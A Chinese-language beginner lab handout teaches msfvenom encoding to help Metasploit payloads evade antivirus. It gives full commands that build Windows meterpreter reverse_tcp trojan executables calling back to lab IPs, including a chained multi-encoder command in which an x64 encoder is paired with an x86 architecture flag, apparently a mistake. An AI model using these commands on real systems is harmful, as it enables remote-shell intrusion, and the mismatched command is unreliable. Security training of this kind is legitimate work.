Orserg ISPT 内网安全项目组A8-1 Or A8-X项目训练文档

Orserg 内网安全项目组官方基础训练文档 （A-8项目）

你好安全人员！我是Orserg一个高性能可开放托管组织，专针对初学安全人员提供最为简单并且完全免费的文档资料。很高兴认识你并且能让你从中学习到一些东西。如果你希望加入Orserg学到更多东西请在****上搜索Orserg关注并且私信我们，我们会在第一时间接收到并且联系你。

Orserg ISPT :

Hello!内网安全实验人员。我是Orserg内网安全项目组简称ISPT，针对学习内网安全的初级A类研究人员提供较为简单的实验项目。在这2个月内你将学会并使用Metasploit的多种基础攻击技能。如信息收集、漏洞扫描、漏洞利用、攻击载荷、免杀编码和社会工程方面的简单攻击。

实验环境：

该文件的所有实验只适用于内网安全，并且所有环境均为自己搭建，包括特殊系统镜像，渗透工具、或者是虚拟机等，请确保你有搭建实验平台的条件，才能顺利完成安全实验。Orserg ISPT在模拟环境方面可能会用到Windows Server服务器或服务器搭建等多种企业环境模拟技术这些技术都会展现在内网实验环境搭建 中。

八、免杀编码

Metasploit中有个功能程序叫msfvenom，那么它其中包含免杀编码，加壳等逃脱杀毒软件的查杀的功能。（这里只提用法其实msfvenom编码并不能实际过杀毒软件）

A-8-1 查看所有编码格式

Root>msfvenom -l encoders (查看所有编码格式)

Tip:假若你面对的目标是Windows电脑系统，那么你使用PPC编码格式，那抱歉这是不可采取的,或者你使用的是32位（X86）电脑系统，你使用X64编码方式，那么抱歉不可取。

A-8-2 使用指定免杀编码格式去编码载荷文件

msfvenom -p windows/x64/meterpreter/reverse_tcp -e ruby/base64 LHOST=10.110.0.182 LPORT=4444 -f exe -o payload.exe
使用方法：
在普通生成木马中加入参数-e 编码器名称

A-8-3 多重编码

所谓一次不行就多次，在加上好几个不同编码器编码，让杀毒软件不轻易杀到木马文件
msfvenom -p windows/x64/meterpreter/reverse_tcp -e ruby/base64 -i 11 LHOST=10.110.0.172 LPORT=222 -f exe -o orserg.exe|msfvenom -e x64/zutto_dekiru -a x86 --platform windows -i 10 -f exe |msfvenom -e x64/zutto_dekiru -a x86 --platform windows -i 12 -f exe

经过3次2个不同编码器的33次编码

Tip:不过请注意msfvenom免杀并不能逃过杀毒软件单纯的编码免杀各个大厂早已经有记录

A-8-X 总结

免杀是个复杂的伪装过程，需要自己去用编程基础和合理利用工具去做实验，现在教的仅仅是基础。以后会用二进制，Shellcode和其他编码，反编译，重放，漏洞伪签名等上百种方法去实验。